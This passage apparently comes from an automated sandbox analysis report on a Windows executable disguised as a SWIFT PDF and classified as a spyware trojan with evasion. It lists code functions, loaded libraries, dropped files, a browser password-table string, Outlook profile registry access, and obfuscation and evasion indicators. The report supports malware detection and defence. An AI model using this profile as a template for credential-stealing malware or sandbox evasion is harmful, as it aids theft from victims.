            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00158DA05_2_00158DA0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_001559685_2_00155968
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00155F905_2_00155F90
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_00152DD15_2_00152DD1
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791C6385_2_3791C638
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791CCA05_2_3791CCA0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_379103AF5_2_379103AF
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791331A5_2_3791331A
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_379158065_2_37915806
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_379178485_2_37917848
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791E7905_2_3791E790
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_37916E915_2_37916E91
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_37916EA05_2_37916EA0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791DEE15_2_3791DEE1
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791BD9C5_2_3791BD9C
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791CCA25_2_3791CCA2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791B4EC5_2_3791B4EC
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791EBF25_2_3791EBF2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791E3405_2_3791E340
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791DA895_2_3791DA89
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791C1F25_2_3791C1F2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791B9445_2_3791B944
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791F0545_2_3791F054
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3791B07F5_2_3791B07F
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6586505_2_3A658650
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6596C85_2_3A6596C8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65BA975_2_3A65BA97
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65A3605_2_3A65A360
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A659D105_2_3A659D10
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65BDF05_2_3A65BDF0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65A9B05_2_3A65A9B0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6529B85_2_3A6529B8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6570615_2_3A657061
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6556605_2_3A655660
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6532685_2_3A653268
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6570705_2_3A657070
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6500405_2_3A650040
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6586405_2_3A658640
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65184C5_2_3A65184C
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6556505_2_3A655650
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6532585_2_3A653258
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6518585_2_3A651858
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6548205_2_3A654820
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A652E005_2_3A652E00
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6514005_2_3A651400
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A656C095_2_3A656C09
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6552085_2_3A655208
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A652E105_2_3A652E10
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6548105_2_3A654810
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A656C185_2_3A656C18
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6520F85_2_3A6520F8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6536C05_2_3A6536C0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6536C25_2_3A6536C2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6574C85_2_3A6574C8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A651CA05_2_3A651CA0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A655AA85_2_3A655AA8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A651CB05_2_3A651CB0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A650EB95_2_3A650EB9
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A655AB85_2_3A655AB8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6574B85_2_3A6574B8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6596B85_2_3A6596B8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6525605_2_3A652560
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6563685_2_3A656368
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A653F705_2_3A653F70
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A653F725_2_3A653F72
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A657B4F5_2_3A657B4F
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65A3525_2_3A65A352
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65255C5_2_3A65255C
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6563585_2_3A656358
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A655F015_2_3A655F01
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A659D005_2_3A659D00
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6521085_2_3A652108
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A653B085_2_3A653B08
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A655F105_2_3A655F10
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A653B185_2_3A653B18
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65AFF75_2_3A65AFF7
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6551FF5_2_3A6551FF
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65AFF85_2_3A65AFF8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6567C05_2_3A6567C0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6543C85_2_3A6543C8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A65A9A05_2_3A65A9A0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A650FA85_2_3A650FA8
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A654DB05_2_3A654DB0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A6567B05_2_3A6567B0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_3A654DB25_2_3A654DB2
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: String function: 00402BBF appears 51 times
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2929742720.00000000073D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SWIFT09181-24_pdf.exe
            Source: SWIFT09181-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeMutant created: NULL
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsl95A3.tmpJump to behavior
            Source: SWIFT09181-24_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A15000.00000004.00000800.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A33000.00000004.00000800.00020000.00000000.sdmp, SWIFT09181-24_pdf.exe, 00000005.00000002.2951065563.0000000037A25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SWIFT09181-24_pdf.exeReversingLabs: Detection: 23%
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeFile read: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess created: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess created: C:\Users\user\Desktop\SWIFT09181-24_pdf.exe "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SWIFT09181-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2618839198.0000000003647000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeCode function: 5_3_001949CC push eax; iretd 5_3_001949CD
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeAPI/Special instruction interceptor: Address: 38706D5
            Source: C:\Users\user\Desktop\SWIFT09181-24_pdf.exeAPI/Special instruction interceptor: Address: 23C06D5
